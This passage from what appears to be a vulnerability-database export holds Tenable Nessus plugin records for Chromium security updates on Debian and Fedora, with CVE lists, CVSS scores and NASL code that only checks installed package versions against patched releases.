script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6420\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"chromium\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-common\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-driver\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-l10n\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-sandbox\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-shell\", reference:\"80.0.3987.132-1~deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:27:26", "description": "Update to 73.0.3683.75. Fixes large bucket of CVEs.\n\nCVE-2019-5754 CVE-2019-5782 CVE-2019-5755 CVE-2019-5756 CVE-2019-5757 CVE-2019-5758 CVE-2019-5759 CVE-2019-5760 CVE-2019-5761 CVE-2019-5762 CVE-2019-5763 CVE-2019-5764 CVE-2019-5765 CVE-2019-5766 CVE-2019-5767 CVE-2019-5768 CVE-2019-5769 CVE-2019-5770 CVE-2019-5771 CVE-2019-5772 CVE-2019-5773 CVE-2019-5774 CVE-2019-5775 CVE-2019-5776 CVE-2019-5777 CVE-2019-5778 CVE-2019-5779 CVE-2019-5780 CVE-2019-5781 CVE-2019-5784 CVE-2019-5786 CVE-2019-5787 CVE-2019-5788 CVE-2019-5789 CVE-2019-5790 CVE-2019-5791 CVE-2019-5792 CVE-2019-5793 CVE-2019-5794 CVE-2019-5795 CVE-2019-5796 CVE-2019-5797 CVE-2019-5798 CVE-2019-5799 CVE-2019-5800 CVE-2019-5802 CVE-2019-5803\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-02T00:00:00", "type": "nessus", "title": "Fedora 30 : chromium (2019-05a780936d)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-5754", "CVE-2019-5755", "CVE-2019-5756", "CVE-2019-5757", "CVE-2019-5758", "CVE-2019-5759", "CVE-2019-5760", "CVE-2019-5761", "CVE-2019-5762", "CVE-2019-5763", "CVE-2019-5764", "CVE-2019-5765", "CVE-2019-5766", "CVE-2019-5767", "CVE-2019-5768", "CVE-2019-5769", "CVE-2019-5770", "CVE-2019-5771", "CVE-2019-5772", "CVE-2019-5773", "CVE-2019-5774", "CVE-2019-5775", "CVE-2019-5776", "CVE-2019-5777", "CVE-2019-5778", "CVE-2019-5779", "CVE-2019-5780", "CVE-2019-5781", "CVE-2019-5782", "CVE-2019-5784", "CVE-2019-5786", "CVE-2019-5787", "CVE-2019-5788", "CVE-2019-5789", "CVE-2019-5790", "CVE-2019-5791", "CVE-2019-5792", "CVE-2019-5793", "CVE-2019-5794", "CVE-2019-5795", "CVE-2019-5796", "CVE-2019-5797", "CVE-2019-5798", "CVE-2019-5799", "CVE-2019-5800", "CVE-2019-5801", "CVE-2019-5802", "CVE-2019-5803", "CVE-2019-5804"], "modified": "2020-05-29T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:30"], "id": "FEDORA_2019-05A780936D.NASL", "href": "https://www.tenable.com/plugins/nessus/124466", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-05a780936d.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124466);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2019-5754\", \"CVE-2019-5755\", \"CVE-2019-5756\", \"CVE-2019-5757\", \"CVE-2019-5758\", \"CVE-2019-5759\", \"CVE-2019-5760\", \"CVE-2019-5761\", \"CVE-2019-5762\", \"CVE-2019-5763\", \"CVE-2019-5764\", \"CVE-2019-5765\", \"CVE-2019-5766\", \"CVE-2019-5767\", \"CVE-2019-5768\", \"CVE-2019-5769\", \"CVE-2019-5770\", \"CVE-2019-5771\", \"CVE-2019-5772\", \"CVE-2019-5773\", \"CVE-2019-5774\", \"CVE-2019-5775\", \"CVE-2019-5776\", \"CVE-2019-5777\", \"CVE-2019-5778\", \"CVE-2019-5779\", \"CVE-2019-5780\", \"CVE-2019-5781\", \"CVE-2019-5782\", \"CVE-2019-5784\", \"CVE-2019-5786\", \"CVE-2019-5787\", \"CVE-2019-5788\", \"CVE-2019-5789\", \"CVE-2019-5790\", \"CVE-2019-5791\", \"CVE-2019-5792\", \"CVE-2019-5793\", \"CVE-2019-5794\", \"CVE-2019-5795\", \"CVE-2019-5796\", \"CVE-2019-5797\", \"CVE-2019-5798\", \"CVE-2019-5799\", \"CVE-2019-5800\", \"CVE-2019-5801\", \"CVE-2019-5802\", \"CVE-2019-5803\", \"CVE-2019-5804\");\n script_xref(name:\"FEDORA\", value:\"2019-05a780936d\");\n\n script_name(english:\"Fedora 30 : chromium (2019-05a780936d)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update to 73.0.3683.75. Fixes large bucket of CVEs.\n\nCVE-2019-5754 CVE-2019-5782 CVE-2019-5755 CVE-2019-5756 CVE-2019-5757\nCVE-2019-5758 CVE-2019-5759 CVE-2019-5760 CVE-2019-5761 CVE-2019-5762\nCVE-2019-5763 CVE-2019-5764 CVE-2019-5765 CVE-2019-5766 CVE-2019-5767\nCVE-2019-5768 CVE-2019-5769 CVE-2019-5770 CVE-2019-5771 CVE-2019-5772\nCVE-2019-5773 CVE-2019-5774 CVE-2019-5775 CVE-2019-5776 CVE-2019-5777\nCVE-2019-5778 CVE-2019-5779 CVE-2019-5780 CVE-2019-5781 CVE-2019-5784\nCVE-2019-5786 CVE-2019-5787 CVE-2019-5788 CVE-2019-5789 CVE-2019-5790\nCVE-2019-5791 CVE-2019-5792 CVE-2019-5793 CVE-2019-5794 CVE-2019-5795\nCVE-2019-5796 CVE-2019-5797 CVE-2019-5798 CVE-2019-5799 CVE-2019-5800\nCVE-2019-5802 CVE-2019-5803\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-05a780936d\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5789\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:30\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^30([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 30\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC30\", reference:\"chromium-73.0.3683.75-2.fc30\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-04T14:41:48", "description": "Update to 73.0.3683.75. Fixes large bucket of CVEs.\n\nCVE-2019-5754 CVE-2019-5782 CVE-2019-5755 CVE-2019-5756 CVE-2019-5757 CVE-2019-5758 CVE-2019-5759 CVE-2019-5760 CVE-2019-5761 CVE-2019-5762 CVE-2019-5763 CVE-2019-5764 CVE-2019-5765 CVE-2019-5766 CVE-2019-5767 CVE-2019-5768 CVE-2019-5769 CVE-2019-5770 CVE-2019-5771 CVE-2019-5772 CVE-2019-5773 CVE-2019-5774 CVE-2019-5775 CVE-2019-5776 CVE-2019-5777 CVE-2019-5778 CVE-2019-5779 CVE-2019-5780 CVE-2019-5781 CVE-2019-5784 CVE-2019-5786 CVE-2019-5787 CVE-2019-5788 CVE-2019-5789 CVE-2019-5790 CVE-2019-5791 CVE-2019-5792 CVE-2019-5793 CVE-2019-5794 CVE-2019-5795 CVE-2019-5796 CVE-2019-5797 CVE-2019-5798 CVE-2019-5799 CVE-2019-5800 CVE-2019-5802 CVE-2019-5803\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2019-03-26T00:00:00", "type": "nessus", "title": "Fedora 29 : chromium (2019-561eae4626)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5754", "CVE-2019-5755", "CVE-2019-5756", "CVE-2019-5757", "CVE-2019-5758", "CVE-2019-5759", "CVE-2019-5760", "CVE-2019-5761", "CVE-2019-5762", "CVE-2019-5763", "CVE-2019-5764", "CVE-2019-5765", "CVE-2019-5766", "CVE-2019-5767", "CVE-2019-5768", "CVE-2019-5769", "CVE-2019-5770", "CVE-2019-5771", "CVE-2019-5772", "CVE-2019-5773", "CVE-2019-5774", "CVE-2019-5775", "CVE-2019-5776", "CVE-2019-5777", "CVE-2019-5778", "CVE-2019-5779", "CVE-2019-5780", "CVE-2019-5781", "CVE-2019-5782", "CVE-2019-5784", "CVE-2019-5786", "CVE-2019-5787", "CVE-2019-5788", "CVE-2019-5789", "CVE-2019-5790", "CVE-2019-5791", "CVE-2019-5792", "CVE-2019-5793", "CVE-2019-5794", "CVE-2019-5795", "CVE-2019-5796", "CVE-2019-5797", "CVE-2019-5798", "CVE-2019-5799", "CVE-2019-5800", "CVE-2019-5801", "CVE-2019-5802", "CVE-2019-5803", "CVE-2019-5804"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:29"], "id": "FEDORA_2019-561EAE4626.NASL", "href": "https://www.tenable.com/plugins/nessus/123100", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-561eae4626.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123100);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2019-5754\",\n \"CVE-2019-5755\",\n \"CVE-2019-5756\",\n \"CVE-2019-5757\",\n \"CVE-2019-5758\",\n \"CVE-2019-5759\",\n \"CVE-2019-5760\",\n \"CVE-2019-5761\",\n \"CVE-2019-5762\",\n \"CVE-2019-5763\",\n \"CVE-2019-5764\",\n \"CVE-2019-5765\",\n \"CVE-2019-5766\",\n \"CVE-2019-5767\",\n \"CVE-2019-5768\",\n \"CVE-2019-5769\",\n \"CVE-2019-5770\",\n \"CVE-2019-5771\",\n \"CVE-2019-5772\",\n \"CVE-2019-5773\",\n \"CVE-2019-5774\",\n \"CVE-2019-5775\",\n \"CVE-2019-5776\",\n \"CVE-2019-5777\",\n \"CVE-2019-5778\",\n \"CVE-2019-5779\",\n \"CVE-2019-5780\",\n \"CVE-2019-5781\",\n \"CVE-2019-5782\",\n \"CVE-2019-5784\",\n \"CVE-2019-5786\",\n \"CVE-2019-5787\",\n \"CVE-2019-5788\",\n \"CVE-2019-5789\",\n \"CVE-2019-5790\",\n \"CVE-2019-5791\",\n \"CVE-2019-5792\",\n \"CVE-2019-5793\",\n \"CVE-2019-5794\",\n \"CVE-2019-5795\",\n \"CVE-2019-5796\",\n \"CVE-2019-5797\",\n \"CVE-2019-5798\",\n \"CVE-2019-5799\",\n \"CVE-2019-5800\",\n \"CVE-2019-5801\",\n \"CVE-2019-5802\",\n \"CVE-2019-5803\",\n \"CVE-2019-5804\"\n );\n script_xref(name:\"FEDORA\", value:\"2019-561eae4626\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0114\");\n\n script_name(english:\"Fedora 29 : chromium (2019-561eae4626)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Update to 73.0.3683.75. Fixes large bucket of CVEs.\n\nCVE-2019-5754 CVE-2019-5782 CVE-2019-5755 CVE-2019-5756 CVE-2019-5757\nCVE-2019-5758 CVE-2019-5759 CVE-2019-5760 CVE-2019-5761 CVE-2019-5762\nCVE-2019-5763 CVE-2019-5764 CVE-2019-5765 CVE-2019-5766 CVE-2019-5767\nCVE-2019-5768 CVE-2019-5769 CVE-2019-5770 CVE-2019-5771 CVE-2019-5772\nCVE-2019-5773 CVE-2019-5774 CVE-2019-5775 CVE-2019-5776 CVE-2019-5777\nCVE-2019-5778 CVE-2019-5779 CVE-2019-5780 CVE-2019-5781 CVE-2019-5784\nCVE-2019-5786 CVE-2019-5787 CVE-2019-5788 CVE-2019-5789 CVE-2019-5790\nCVE-2019-5791 CVE-2019-5792 CVE-2019-5793 CVE-2019-5794 CVE-2019-5795\nCVE-2019-5796 CVE-2019-5797 CVE-2019-5798 CVE-2019-5799 CVE-2019-5800\nCVE-2019-5802 CVE-2019-5803\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-561eae4626\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5789\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"chromium-73.0.3683.75-2.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:07:53", "description": "Update to 80.0.3987.149. Upstream says it fixes '13' security issues, but only lists these CVEs :\n\n - CVE-2020-6422: Use after free in WebGL\n\n - CVE-2020-6424: Use after free in media\n\n - CVE-2020-6425: Insufficient policy enforcement in extensions. \n\n - CVE-2020-6426: Inappropriate implementation in V8\n\n - CVE-2020-6427: Use after free in audio\n\n - CVE-2020-6428: Use after free in audio\n\n - CVE-2020-6429: Use after free in audio.\n\n - CVE-2019-20503: Out of bounds read in usersctplib.\n\n - CVE-2020-6449: Use after free in audio\n\n----\n\nUpdate to 80.0.3987.132. Lots of security fixes here. VAAPI re-enabled by default except on NVIDIA.\n\nList of CVEs fixed (since last update) :\n\n - CVE-2019-20446\n\n - CVE-2020-6381 \n\n - CVE-2020-6382 \n\n - CVE-2020-6383 \n\n - CVE-2020-6384\n\n - CVE-2020-6385 \n\n - CVE-2020-6386\n\n - CVE-2020-6387 \n\n - CVE-2020-6388\n\n - CVE-2020-6389\n\n - CVE-2020-6390 \n\n - CVE-2020-6391\n\n - CVE-2020-6392 \n\n - CVE-2020-6393\n\n - CVE-2020-6394\n\n - CVE-2020-6395\n\n - CVE-2020-6396 \n\n - CVE-2020-6397 \n\n - CVE-2020-6398\n\n - CVE-2020-6399 \n\n - CVE-2020-6400 \n\n - CVE-2020-6401 \n\n - CVE-2020-6402 \n\n - CVE-2020-6403 \n\n - CVE-2020-6404 \n\n - CVE-2020-6405 \n\n - CVE-2020-6406 \n\n - CVE-2020-6407\n\n - CVE-2020-6408 \n\n - CVE-2020-6409 \n\n - CVE-2020-6410 \n\n - CVE-2020-6411 \n\n - CVE-2020-6412 \n\n - CVE-2020-6413 \n\n - CVE-2020-6414 \n\n - CVE-2020-6415 \n\n - CVE-2020-6416 \n\n - CVE-2020-6417\n\n - CVE-2020-6418\n\n - CVE-2020-6420 \n\n----\n\nUpdate to 79.0.3945.130. Fixes the following security issues :\n\n - CVE-2020-6378\n\n - CVE-2020-6379\n\n - CVE-2020-6380\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-30T00:00:00", "type": "nessus", "title": "Fedora 30 : chromium (2020-39e0b8bd14)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-20446", "CVE-2019-20503", "CVE-2020-10531", "CVE-2020-6378", "CVE-2020-6379", "CVE-2020-6380", "CVE-2020-6381", "CVE-2020-6382", "CVE-2020-6383", "CVE-2020-6384", "CVE-2020-6385", "CVE-2020-6386", "CVE-2020-6387", "CVE-2020-6388", "CVE-2020-6389", "CVE-2020-6390", "CVE-2020-6391", "CVE-2020-6392", "CVE-2020-6393", "CVE-2020-6394", "CVE-2020-6395", "CVE-2020-6396", "CVE-2020-6397", "CVE-2020-6398", "CVE-2020-6399", "CVE-2020-6400", "CVE-2020-6401", "CVE-2020-6402", "CVE-2020-6403", "CVE-2020-6404", "CVE-2020-6405", "CVE-2020-6406", "CVE-2020-6407", "CVE-2020-6408", "CVE-2020-6409", "CVE-2020-6410", "CVE-2020-6411", "CVE-2020-6412", "CVE-2020-6413", "CVE-2020-6414", "CVE-2020-6415", "CVE-2020-6416", "CVE-2020-6417", "CVE-2020-6418", "CVE-2020-6420", "CVE-2020-6422", "CVE-2020-6424", "CVE-2020-6425", "CVE-2020-6426", "CVE-2020-6427", "CVE-2020-6428", "CVE-2020-6429", "CVE-2020-6449"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:30"], "id": "FEDORA_2020-39E0B8BD14.NASL", "href": "https://www.tenable.com/plugins/nessus/134990", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-39e0b8bd14.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(134990);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-20446\", \"CVE-2019-20503\", \"CVE-2020-10531\", \"CVE-2020-6378\", \"CVE-2020-6379\", \"CVE-2020-6380\", \"CVE-2020-6381\", \"CVE-2020-6382\", \"CVE-2020-6383\", \"CVE-2020-6384\", \"CVE-2020-6385\", \"CVE-2020-6386\", \"CVE-2020-6387\", \"CVE-2020-6388\", \"CVE-2020-6389\", \"CVE-2020-6390\", \"CVE-2020-6391\", \"CVE-2020-6392\", \"CVE-2020-6393\", \"CVE-2020-6394\", \"CVE-2020-6395\", \"CVE-2020-6396\", \"CVE-2020-6397\", \"CVE-2020-6398\", \"CVE-2020-6399\", \"CVE-2020-6400\", \"CVE-2020-6401\", \"CVE-2020-6402\", \"CVE-2020-6403\", \"CVE-2020-6404\", \"CVE-2020-6405\", \"CVE-2020-6406\", \"CVE-2020-6407\", \"CVE-2020-6408\", \"CVE-2020-6409\", \"CVE-2020-6410\", \"CVE-2020-6411\", 